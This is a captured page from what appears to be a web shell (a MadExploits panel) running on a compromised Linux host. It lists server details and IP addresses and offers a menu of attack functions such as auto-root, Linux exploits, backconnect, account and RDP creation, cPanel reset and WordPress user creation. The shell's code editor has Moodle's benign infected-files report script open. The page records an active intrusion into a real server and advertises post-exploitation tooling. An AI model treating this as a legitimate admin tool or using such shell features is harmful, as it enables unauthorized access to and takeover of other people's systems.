Linux aries.aptans.com 4.18.0-348.20.1.lve.1.el8.x86_64 #1 SMP Wed Mar 16 08:45:39 EDT 2022 x86_64
Apache
: 135.181.142.107 | : 172.70.127.69
Cant Read [ /etc/named.conf ]
7.4.33
aja
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
aja /
public_html /
ead /
report /
infectedfiles /
[ HOME SHELL ]
Name
Size
Permission
Action
classes
[ DIR ]
drwxr-xr-x
lang
[ DIR ]
drwxr-xr-x
index.php
2.53
KB
-rw-r--r--
settings.php
1.13
KB
-rw-r--r--
version.php
1.04
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : index.php
<?php // This file is part of Moodle - http://moodle.org/ // // Moodle is free software: you can redistribute it and/or modify // it under the terms of the GNU General Public License as published by // the Free Software Foundation, either version 3 of the License, or // (at your option) any later version. // // Moodle is distributed in the hope that it will be useful, // but WITHOUT ANY WARRANTY; without even the implied warranty of // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the // GNU General Public License for more details. // // You should have received a copy of the GNU General Public License // along with Moodle. If not, see <http://www.gnu.org/licenses/>. /** * Infected file report * * @package report_infectedfiles * @author Nathan Nguyen <nathannguyen@catalyst-au.net> * @copyright Catalyst IT * @license http://www.gnu.org/copyleft/gpl.html GNU GPL v3 or later */ require(__DIR__.'/../../config.php'); require_once($CFG->libdir.'/adminlib.php'); use \core\antivirus\quarantine; admin_externalpage_setup('reportinfectedfiles', '', null, '', array('pagelayout' => 'report')); $action = optional_param('action', '', PARAM_TEXT); // If action exists, we need to process the actions safely. if (!empty($action)) { // Nothing can be done without a valid sesskey. require_sesskey(); // For any cancel actions, just reload the page clean. $cancel = $PAGE->url; // Decide on page action. switch ($action) { case 'download': $fileid = required_param('file', PARAM_INT); quarantine::download_quarantined_file($fileid); break; case 'downloadall': quarantine::download_all_quarantined_files(); break; case 'delete': $fileid = required_param('file', PARAM_INT); quarantine::delete_quarantined_file($fileid); break; case 'deleteall': // Remove file until current time. quarantine::clean_up_quarantine_folder(time()); break; } // Reload page cleanly once actions are processed. redirect($PAGE->url); } // Once actions are dealt with, display the page. $page = optional_param('page', 0, PARAM_INT); echo $OUTPUT->header(); echo $OUTPUT->heading(get_string('infectedfiles', 'report_infectedfiles')); $table = new \report_infectedfiles\table\infectedfiles_table('report-infectedfiles-report-table', $PAGE->url, $page); $table->define_baseurl($PAGE->url); echo $PAGE->get_renderer('report_infectedfiles')->render($table); echo $OUTPUT->footer();
Close